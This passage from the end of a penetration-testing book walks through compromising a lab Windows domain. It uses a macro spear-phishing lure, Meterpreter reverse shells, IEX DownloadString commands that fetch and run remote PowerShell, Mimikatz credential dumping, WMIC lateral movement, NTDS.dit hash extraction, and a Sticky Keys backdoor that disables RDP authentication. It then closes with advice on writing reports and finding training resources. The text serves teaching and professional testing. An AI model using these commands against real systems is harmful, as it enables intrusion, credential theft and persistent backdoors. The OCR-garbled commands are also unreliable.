This will place a PowerShell reverse HTTPS Meterpreter script onto the victim host and make a 
registry entry to add persistence on reboot. 


With that Excel file, we log into the accounts we captured to see with whom they are communicating. 
Since we need the user to click the *Enable Macros" button, we need to find and build a trust 
relationship. Therefore, look for someone who has had conversations in the past and make our Excel 
files look like the ones they are sending back and forth. In the reply email, make sure you specify that 
the recipient opens the Excel file and clicks on the *Enable Macros" button. 


Before they open the email, we need to start up a Meterpreter handler. We kick off Easy-P, and select 
PowerShell Meterpreter to create the code for a resource listener file. With a quick msfconsole -r 
listener.rc, we now have a full handler running. 


Once the victim opens our malicious file, we get a Meterpreter shell! 
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ы j.p jet /INITM receiv 
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ад. . 
9.1: 24153) 


maf exploit(handler) > sessions 
Starting interaction with 3 


1 cre nit tad. 
Windows [Version 6.1.7601] 
2009 Microsoft Corporation. ALL rights reserved. 
Meterpreter Shells from Spear phishing 





Fifty-Yard Line: 


Sadly, we find out we a power user with limited rights. We won’t be able to dump hashes just yet. 
So, we run Powerup froma shell to see if there are any ways to get to system. 
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Privilege Escalation 


Luckily, we find an unquoted service and Write-ServiceEXE issues. We run PowerUp to abuse those 
vulnerabilities, create a new user, and restart the service. A quick “runas” command execution allows 
us to kick off another PowerShell Invoke-Shellcode Meterpreter using the Administrative account we 
just created. With a quick bypassuac injection and getsystem on Meterpreter, we are now system! 


We jump back to Easy-P and generate a Mimikatz command: 


Exit/Quit 


[*]Base64 

Powershell . ехе 

1 g wBuAGwAbwBhAGQAUwWB( 

AKAAn dABOAHAA: AGEAdwAuAGc BAG QBiAHUAcwBLAHIAYWwB\ 

ALwBQA Iv. wBwAGwAbw HQALwB 

pwB rAGUALQBNAGKAbQBpAGs 
DC WBL TQBp QBrAGEAdAB6AA-- 
PowerShell - Invoke Mimikatz 





When we run the PowerShell Invoke-Mimikatz as system, we can grab the user 
memory. 





Passwords from Memory 


Seventy-Y ard Line: 


password from 


Now that we have the user’s password, let’s find who the Domain Admins are. From a shell, we 
type: 
e net group “Domain Admins" /domain 
e C:\Users\testuser1>net group "Domain Admins" /domain 
The request will be processed at a domain controller for domain hacker.testlab. 
Group name Domain Admins 


Comment Designated administrators of the domain 
Members 
Administrator lab 


The command completed successfully. 


From the results, we see that “lab” is a domain admin. Let's see where he is logged in. From the 
Lateral Pass section, we looked at PowerView and the UserHunter functionalities. It queries all of 
Active Directory for hosts and sees what users are logged in to each individual host. 
e  Powershellexe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-UserHunter -UserName "lab" 





| 
r 
| 
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r 
er 'lab' logged 
Finding Which Computer the Doma 


We know we can't log into ће Domain Controller, but we do have access to the Win8 host. To move 
laterally, we can execute commands on report hosts using WMIC. The payload we want to execute is 
a PowerShell Meterpreter on that particular host: 
ө IEX (New-Object 
Net.WebClient).DownloadString('https://raw .githubusercontent.conycheetz/PowerSplc 
-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse https - 
Lhost 172.16.151.128 -Lport 8080 -Force 


I want to reiterate one note, as I see it happen a lot with PowerShell. If you are attacking a Windows 
32-bit vs 64-bit system through WMIC, they may require different commands. The first command is 
targeting 32-bit systems and the second command below targets 64-bit systems: 
ө wmic /USER:"hacker\testuser 1" /PASSWORD:"!Asdfasdfasdfl !" 
/NODE:172.16.151.202 process call create "powershell -EncodedCommand 


SOBFAFgAIAAoAEAAZQB3ACOA...AAWACAALQBGAGSAcgBjAGUA" 


ө wmic /USER:"hacker\testuser 1" /PASSWORD:"!Asdfasdfasdfl !" 
/NODE:172.16.151.201 process call create 
"% WinDir%\syswow 64\windowspowershell\v 1 .0\powershell.exe -enc 


SOBFAFgAIAAoAEA4AZQB3ACOA...AAWACAALQBGAGSACcgBjAGUA" 


root@kali: /opt 
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Remotely Executing PowerShell Using WMI 


Eighty-Yard Line: 


We now have a Meterpreter Shell on that host and find that we are a local admin on that host. We run 
a quick getsystem and will need to pull hashes. We drop back into Easy-P, create a dump hashes 
command, and execute: 


File Edit View Search Terminal Help 


] Privilege Escalation 
Lateral Movement 


11 Meterpreter 


sers Execution Policy 
L 101 


xe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebCl 
aster/Exfilt ration/Invoke- Mimikatz.psl'); Invoke-Mii 
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Generating PowerShell to Dump Hashes 





root@kali; /opt 
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Executing PowerShell — Mimikatz 


Goal Line: 


We have obtained the password for a Domain Administrator. Let’s use Metasploit and pull the hashes 
off of the Domain Controller. 


Metasploit has a great module to pull hashes: 
e use auxiliary/admin/smb/psexec ntdsgrab 
e Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser 


e exploit 
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Dumping the Domain Controller Hashes 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file to the /root/.ms4/loot/ 
folder. Next, convert the dit file to hashes with esedbtool and NTDSextract. 


esedbexport command: 
e esedbexport -t [Location of Export] [NTDS.dit file] 


ө /opt/esedbtools/esedbexport -t /tmp/ntds 
/root/.msf4/loot/20150214180250_ default 172.16.151.200 psexec.ntdsgrab. 641158. 
: t# /o ase asedbexport : ds /root/.mSf4/1lo 





ot /20150214 ult_172.16.151 sexec.ntdsgrab. 641158.dit 


s) Qut Of 14. 
Shadow) oüt 


ess table) out of 14. 


Recovering the NTDS.dit 


Next, we need to run dshashes.py to convert our tables to password hashes: 
e dshashes.py [datatable table] [link table] --passwordhashes [original bin file from 


ntdsgrab] 

e python /opt/NTDS Xtract/dshashes.py /tmp/ntds.export/datatable.4 
/tmp/ntds.export/link table.7 /tmp/ --passwordhashes 
/root/.msf4/loot/20150214180253 default 172.16.151.200 psexec.ntdsgrab. 127578. 





Parsing Hashes 


Touchdown! Touchdown! Touchdown! 


We have just dumped the whole Active Directory environment! Lastly, we add a little backdoor for 
persistence. We quickly run a few registry changes on the Domain Controller and all the hosts in 
order to enable the Sticky Key backdoor. 


e wmic /user:[User Name] /password: [Password] /node:[Server] process call create 
"C:\Windows\system32\reg.exe ADD |. "HKLMSSOFTWAREMIcrosoftWindows 
NT\CurrentVersion\Image File Execution Options sethc.exeV' /v Debugger Ж REG SZ 
/d \"C:\windows\system32\cmd.exe\" /f" 

ө wmic /user:[User_Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD 
\"HKLM\S YSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- 
Tcp" /v UserAuthentication /t REG DWORD /d 0 /f" 

e wmic /user:[User Name] /password: [Password] /node: [Server] process call create 
"C:\Windows\system32\reg.exe ADD 
\"HKLM\S YSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP- 
Tcp" /v SecurityLayer Л КЕС DWORD /d 0 /f" 


Now, even if they change all their passwords, we still have a system shell on their DCs. 


ther user 





Ell windows Server2012 R2 
Sticky Key 


The crowd goes wild and you pull out your best touchdown dance. With that successful two-minute 
drill, you go home complete and ready to write your report. 


Post Game Analysis - Reporting 


Success! You have finally fully compromised Secure Universal Cyber Kittens, pivoted to sensitive 
networks, stolen credentials and documents, and managed to keep backdoors on their servers. Now, it 
is time to wrap up the test and write the final report. 


The final delivered report is really the only thing that will matter to the client. The report is how you, 
the penetration tester, will get paid and be asked to come back. Therefore, this is by far the most 
important aspect of your test. You need to be able to explain the findings, rate the vulnerabilities, and 
explain how the results will affect the customer in the real world. Regardless of how many hosts you 
compromise or how quickly you move laterally through the network, if the client can’t understand the 
end report, reproduce exploitation, and effectively implement remediation, it is not worth its value. 
Anyone can run a vulnerability scanner and change the organization name, but not everyone can 
understand what the vulnerabilities actually mean. 


If you have ever had multiple penetration testers assess your network, you will find that the reports 
will vary based on who is performing the test. Some pentesting companies will just re-template a 
vulnerability scanner report, while quality pentesting companies will provide a well-detailed report 
and include repeatable steps. There is little value in a report that merely states that the client has 100 
critical Apache/PHP findings. Real value comes from the fact that the report can confirm whether or 
not the findings are valid based on the vulnerability, not just based on the banner version. 


Your final report should be influenced by your own presentation style and findings. However, I will 
give you some hints and best practices when creating your report. 


Some things to think about when writing a report: 

e [ say this every time: DON'T SUBMIT A RE-TITLED Nexpose or Nessus report. I 

have seen this happen more than once or twice in my lifetime, where we received a 

re-titled report from a consulting company. 

e Rate your vulnerabilities 
© You should figure out a way to consistently rate your vulnerabilities. 
I have built my own matrix that includes references from NIST, DISA, 
CVSS, and personal experience to assign ratings to vulnerabilities. 
о The matrix includes increasing or decreasing severity based on 
internal/external findings, possible availability of exploit code, how 
widespread their systems are, what the exploits can lead to, and how it 
affects the CIA security triangle. 
© Vulnerabilities that go through my matrix will always have the same 
criticality level. If a client asks how I scored a rating for a 
vulnerability, I can reference my matrix. 
o You might have a vulnerability that might be a “medium” in severity 
to the scanner, but what if it is systemic? If it is found not on one host 


but on every host, does the overall severity of the issue turn to “high”? 

e Theoretical vs. Real Findings 
О I generally do not like to mark findings as critical if they are only 
theoretical and have no actual known exploit available. These should 
still be considered findings, but I will generally lower the rating if I 
can't find any avenue to exploit the host. 
о This gives the client help in properly identifying which findings need 
immediate attention versus those that can be applied during a regular 
change control window. 

ө Solutions are just as important as the findings 
o If you use a tool to compromise a network, you have to have a 
solution to stop it. 
o If you don't have a solution, help the client develop a mitigation 
strategy. 

e Don't mis-rate vulnerabilities 
o HTTP Flags: As I have said in the prior book, I still see HTTP flags 
all the time. A scanner will come back with flags not being enabled, 
such as secure flag or missing httpOnly. What if the site doesn't even 
support any type of client authentication or even provide a user with 
any input variables? It is definitely a finding, but it could be 
significantly lower than the scanner outputs. 
о Cross site scripting can be very dangerous, but having a “high” 
finding within a forum versus a site that has no users or data to be 
inputted to a backend database, should have very different ratings. 
o Apache Findings: This is a great example of what I feel distinguishes 
good reports from bad reports. Apache findings come up all the time 
because they are solely based on banner results. You might see a PHP- 
CGI finding that comes up as critical and report it, but when the client 
investigates 1t, he/she finds that CGI wasn't even enabled on the server. 

e Make sure vulnerabilities are actual vulnerabilities 
o I don't know how many times I have received penetration testing 
results telling me my systems had PHP exploits on them. This is 
because the scanner, based on version, alerted them of these critical 
findings. Some of the findings state that they are PHP CGI issues or 
Apache mod security issues. The problem is my servers don't run the 
CGI scripts, but the scanner identified the issue just solely based on 
versioning. Please make sure that you validate that findings are actual 
findings. 

e Standardize all your reports by using LaTex templates or something similar. 


Again, all these findings should be reported, but having the right severity rating is what is important. 
It is critical when writing a penetration test to identify what 1s realistic versus what is theoretical. I 
generally have two parts to a report-the first is what can actually be done with known exploits, and 
the second is everything else that the scanner picked up. 


ы. you shouldn’t you do: 





scumbagpentester-58747 


What you should have in your report: 

e Introduction/Overview 
o High-level description of the project, dates, and 
company/infrastructure being tested. 

e Scope and Objectives 
о This section should outline the IP ranges, URLs, and applications that 
are to be tested. It should also explain the purpose of the test. 

e Deviations from the Statement of Work 
o Many tests have changes from the original requirements, such as 
having to stop testing on a host, to stop scanning, and/or make changes 
to the testing windows. 

e Methodology 
o A high-level description of the testing process and standards. 

e Significant Assessment Findings 
o This section should be dedicated to critical findings. 

e Positive Observations 
o This part is just as important as the significant findings. No one likes 
to see a whole report where their company is beat up. Talking about 
what the company did well helps lessen the blow on where fixes need 
to be made. 

e Findings Summary 
o Overall view on the findings broken down by severity. 
o Conclusion of summary that explains if the environment was found to 
be vulnerable for any opportunities for exploitation. 

e Detailed Findings 
o This should include severity, vulnerability definition, issue/detailed 
description/risks, asset, recommendation, snapshots/logs/how to 
exploit walkthrough 

e Appendix 
o Listing of all assets and ports 
o Additional information and snapshots 


Some examples of reports: 


http://isecpartners.github.io/publications/ASEC Cryptocat 1OS.pdf 
https://www.offensive-security.com/reports/penetration-testing-sample-report-2013.pdf 
http://www.pentest-standard.org/index.php/Reporting 
http://resources.infosecinstitute.com/writing-penetration-testing-reports/ 


There are times when I generate a second report, based on the client. The second report will be 
directed toward higher management and will discuss the systemic issues and patterns of gaps in 
security. This shouldn’t be very detailed or technical, but should mainly state facts at a high-level, 
based on the test. 


Lastly, if you want to set yourself apart from other pentesters, try to find ways to give yourself added 
value that others may not offer. For example, if you are doing a PT for a large company, you can 
provide a simple OSINT (Open Source Intelligence) report, in addition to the final report, to describe 
what and who can be publicly found from the Internet. There have been times when I created scripts 
(Python, PowerShell, Bat) that perform checks against critical findings, so that after they remediate 
their systems, they can just execute the script to verify. 


Continuing Education 


So, you have just finished this book and may have a thirst for more. One of the most important factors 
in succeeding in this field is that it takes experience-not just learning from books and videos. Start 
learning from labs and vulnerable VMs. If you do not currently work for a penetration testing 
company, start working on bug bounties. Bug bounties are legal ways to find security bugs on 
production sites. Remember to read ALL the fine print before doing any testing. 


Bug Bounties: 


e https://bugcrowd.com/list-of-bug-bounty-programs 
e http://www.bugsheet.com/bug-bounties 


Secondly, if you aren't involved in the security community, you're doing it wrong! It is easy to get 
involved. There are a ton of local security groups in every city: 


B-sides: http://www.securitybsides.com/w/page/12194156/FrontPage 
OWASP: https://www.owasp.org/index.php/OWASP Chapter 
Hacker Spaces: http://hackerspaces.org/wiki/List of hackerspaces 


Major Security Conferences: 


If you are looking for the bleeding-edge research, security conferences are the place to go. It is a great 
place to meet like-minded individuals, get your hands dirty, and learn. Two major websites that have 
a great list of security conferences are: 


e https://secore.info/conferences 
e http://infosecevents.net/calendar/ 


I will give you a small sample of the conferences that I would recommend from personal experience 
(in no particular order): 
e DefCon (http://www.defcon.org/) - This is one of the largest hacker conferences in 
the world and takes place in Las Vegas, NV. This conference is a must and is 
relatively affordable. 
e DerbyCon (https://www.derbycon.com/) - Another relatively low-cost conference, 
which takes place in Kentucky. Some of my favorite talks have come from DerbyCon. 
e BlackHat (http://www w.blackhat.com/) - This conference is also held in Las Vegas, 
NV and is directed more toward corporate employees. It has great speakers, but is 
extremely expensive. 
e Bsides (http://www.securitybsides.com/) - There are Bsides conferences all over 
the country and are usually FREE. Find yours! 
e ToorCon (http://toorcon.net/) - This is one of the smaller conferences and is held in 


San Diego, CA. You will meet a lot of new people here and everyone is pretty 
friendly. 

e CanSec (http://cansecwest.com/) - CanSecWest conference is one of the more 
technical conferences. Although, extremely pricey, it is best known for its PVUNZOWN 
contest. 

e Shmoocon (http://www.shmoocon.org/) - One of the largest conferences on the east 
coast and usually under $200. This is one of my favorite conferences. 

e OWASP AppSec 
(https://www.owasp.org/index.php/Category: OWASP AppSec Conference) - Cheap 
and fun conference focused on web application security. Cost is typically under $100 
if you are an OWASP member. 

e Lethal (http://www.meetup.com/LETHAL/) - Of course, I have to include my group. 
Although, it is not a conference, we have monthly meetups and have presenters. Not 
only is it free, but the group is small, so it is easy for you to get involved and meet 
others with similar interests. If you are in the LA/Orange County CA area, come by! 

e The Ethical Hackers Club (TEHC) - This is one of my old groups in the Maryland 
area. TEHC 1s open for anybody with or without experience in network and computer 
security. They offer an open forum of discussion and informal training on anything 
network and computer security related. Sign up at www.t-e-h-c.com or 


http://www.meetup.com/ethical-hacker-club. 


But don’t forget, sometimes the best conferences are those that are local. They might not have the most 
famous speakers or most professional setting, but this is where you will find people just like you. I 
find that the people at the local events are much more open to sharing and working on projects 
together. 


Training Courses: 


If you are looking for a jumpstart into a particular field in security, you would most likely benefit 
from a training course. Since there are so many different training courses to choose from, here are 
some recommendations: 
e BlackHat - This one is pretty expensive, but it offers a lot of different courses, 
which are taught by some of the best. 
e DerbyCon - Well-priced training in Kentucky and occurs during the conference. 
e SANS (http://www.sans.org) - Expensive training, but they are the industry 
standard. 
e Offensive Security (http://www.offensive-security.com/) - Well-priced and I highly 
recommend taking the online Offensive Security courses. You get a lot of great hands- 
on experience, but will need to invest a lot of time. 


ө Exodus - (https://www.exodusintel.com/training.html) - Excellent training course 


for advanced vulnerability and exploitation courses. 


Free Training: 


ө Offensive Computer Security FSU: 


http://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/ 

e Pentesterslab: https://pentesterlab.com/exercises/ 

ө Cybrary: http://www.cybrary.it/ 

ө Open Security Training: http://opensecuritytraining.info/Training. html 
e Coursea: https://www.coursera.org 

ө EdX: https://www.edx.org/ 


Capture The Flag (CTF) 


If you plan to make this your profession or even if you do this for fun, you really need to get involved 
with different CTF challenges. Try to find a few friends or maybe find your local security group to 
attempt these challenges. Not only will it test your skill and understanding of attacks, but you will 
also be able to better connect with other people in the industry. Spending three days and nights doing 
a challenge is probably one of the most rewarding experiences. 

Go visit https://ctftime.org and find out where and when the next CTFs are. If you are in the Orange 
County, CA area, stop by www.meetup.conylethal and join one of our teams! 


Keeping Up To Date 


Here are a list of RSS feeds I monitor on a daily basis. I made it small enough so that I can quickly 
look through it all in a matter of minutes: 


e http://www.securepla.net/rss.php 
Mailing Lists 


e Seclist.org has taken over what used to be Full Disclosure. This is a vendor-neutral 
forum for detailed discussion of vulnerabilities and exploitation techniques, as well as 
tools, papers, news, and events of interest to the community. 

o http://seclists.org/fulldisclosure/ 
e Dragon News Bytes - Great topics on everything such as privacy, tools, malware, 
attacks, presentations, and more. 


o https://www.team-cymru.org/News/dnb.html 


Podcasts 


I have actually moved over to listening to podcasts versus just reading RSS feeds. Are you looking 
for bleeding-edge security issues being discussed by some of the best? Take a spin through some of 
these: 


e Brakeing Down Security - http://brakeingsecurity.blogspot.com/ 

e Risky Business - http://risky.biz/netcasts/risky-business 

e Security Now - https://www.grc.com/securitynow.htm 

e Security Weekly - https://securityweekly.com/podcasts/ 

e The Social-Engineer Podcast - http://www.social-engineer.org/category/podcast/ 

e Hak5  -https://itunes.apple.conyus/podcast/hak5-quicktime-large/1d1l 17137282? 
mt=2 

e SecuraBit - https://itunes.apple.com/us/podcast/securabit/1d280048405 


Learning From The Bad Guys 


When I teach my penetration testers, one of the most important things I tell them is to watch what the 
bad guys do. Not only does it help extend the attack process, but it also helps with lateral movement 
and learning what works in the real world. One of the main reasons my clients hire me is to emulate 
what the bad guys might do. If you are using theoretical attacks, this might not be as beneficial as 
using the tactics that their adversaries might try to do. 


Also, make sure you learn about your client’s industry. If their attacks use PDFs versus credential 
compromise, you might want to focus your attacks on those types. The more you can emulate their 
patterns, the better the company can protect themselves against their most immediate threats. 


Some Examples: 


Kerberos Golden Ticket Attacks and Sticky Keys 


e http://blog.cobaltstrike.com/2015/01/07/pass-the- golden-ticket-with-wmic/ 
FireEye/Mandiant APT Tools and Techniques 


e https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf 
CrowdStrike Blog 


e http://blog.crowdstrike.cony 
Verizon Data Breach Report 


ө http://www.verizonenterprise.com/DBIR/2014/reports/rp Verizon-DBIR- 
2014 en xg.pdf 
Skeleton Key Attack 


ө http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key- 
malware-analysis/ 


For any good penetration tester, doing research should be half your time. Learning what the bad guys 


do and being able to emulate them will be useful to your job, and even more useful to your client. 


Final Notes 


Now, you have fully compromised the SUCK organization, cracked all the passwords, found all of 
their weakness, and made it out clean. It is time to take everything you learned and build on top of 
that. I have already recommended that you get involved with your local security groups and/or 
participate in security conferences. You can also start a blog and start playing with these different 
tools. Find out what works and what doesn’t and see how you can attack more efficiently and be 
silent on the network. It will take some time outside your normal 9-to-5 job, but it will definitely be 
worth it. 


I hope you have found the content in this book to be something of value and picked up some tips and 
tricks. I wrote this second book mainly because security is always changing and it is really important 
to stay on top of your game. As I have emphasized throughout this book and the prior one, there isn’t a 
point when you can say you have mastered security. However, once you have the basics down pat, the 
high-level attacks don’t really change. We see time and time again that old attacks come back and that 
you always need to be ready. 


If you did find this book to be helpful, please feel free to leave me a comment on the book’s website. 
It will help me to continue developing better content and see what topics you would like to hear more 
about . If I forgot to mention someone in this book or I misspoke on a topic, I apologize in advance 
and will try my best to provide updated/corrected information on the book website. 


Subscribe for Book Updates: 


http://thehackerplaybook.com/subscribe 
Twitter: @HackerPlaybook 

URL: http://TheHackerPlaybook.com 
Github: https://www.github.com/cheetz 
Email: book@thehackerplaybook.com 


*From the last book, I know that many of you downloaded copies of my book through less than legal 
means. Although I don’t promote it, I am glad that I was able to share my knowledge and hope this 
continues your interest in computer security. If you did happen to stumble on this copy somewhere on 
the “internets” and did like my book, feel free to donate to the BTC address below. All proceeds will 
go directly to LETHAL (http://www.meetup.com/lethal/) to promote the growth of our security 
community. 


Happy Hacking! 
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